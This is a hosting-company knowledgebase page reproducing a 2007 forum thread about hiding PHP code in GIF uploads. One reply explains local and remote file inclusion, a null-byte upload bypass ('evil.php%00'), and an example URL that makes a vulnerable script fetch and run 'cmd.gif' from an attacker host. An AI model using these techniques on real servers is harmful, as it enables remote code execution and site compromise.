User Registration
Customer Login

Knowledgebase

Portal Home > Knowledgebase > Articles Database > PHP/GIF Exploit


PHP/GIF Exploit




Posted by SI-Chris, 06-23-2007, 05:47 PM
I read about a new exploit that imbeds PHP code in a GIF file: http://news.com.com/8301-10784_3-9731991-7.html How would that work exactly? Wouldn't a server have to be set up specifically to parse PHP code in gif files? Who would set up their server that way? Is there a way around that so you can remotely trick the server into parsing gif files as PHP code?
Posted by b3nz, 06-23-2007, 06:08 PM
I didn't read this article but there are some ways to embed php codes in a file with any extension you like ! Local File Inclusion and Remote File inclusion are the main methodes !, Ofcourse you can upload a php shell with .php.gif extension with using of null bytes like %00 in some portals anyway, yes, it's possible and it's not an exploit
Posted by SI-Chris, 06-23-2007, 06:34 PM
According to the article (it's only a few paragraphs long), the code is executed when someone tries to view the image after it's uploaded. So I don't understand how that would work unless someone had specifically configured their server to parse .gif files as PHP, and again, who would do that? Is there something I'm missing?
Posted by b3nz, 06-23-2007, 06:51 PM
Imagine that there's a vulnerable portal installed on a server which allows you to execute local files with a url like http://victim/script.php?variable=[file-address], so you upload a file such as cmd.gif as your avatar or ... in that script and then you use the url for executing another way that called as RFI ( remote file inclusion ) allows you to include a file with any extension like cmd.gif from a foreign host, look this code : now the attacker can use http://victim/script.php?var=http://attacker/cmd.gif and executing his codes on server and there's another vulnerability in some scripts which uploads file on server, the attacker wants to upload his evil.php on server but the script doesn't allow .php files to be uploaded, so the attacker rename his file to evil.php%00 ( %00 is a null byte ) and tricks the script


Was this answer helpful?

Add to Favourites Add to Favourites    Print this Article Print this Article

Also Read
Question about the FFMEPG AutoInstaller (Views: 626)
Accidentally killed PHP (Views: 661)
Peer 1 Service Provider (Views: 679)
Elite Data Hosting (VPS) - Scheduled Server Maintenance (Views: 654)
WH4L (Views: 681)

Language:

Our Services

Client Menu

Legal

+1 512-782-9732

Find any answers
you need...



  • PCI Secure
  • Verefied by VISA
  • MasterCard SecureCode

    • Terms of Service | Privacy Policy | FAQs | Affiliates | Email
    Copyright © 2015 BraginHos / CHS Gateway inc. - All Rights Reserved.
    Our address: CHS GATEWAY INC c/o Regus Offices, 2598 E. Sunrise Blvd Ste 2104, Fort Lauderdale, Florida 33304, contact phone number: (+1) 512-782-9732, email: support@chsgatewayinc.com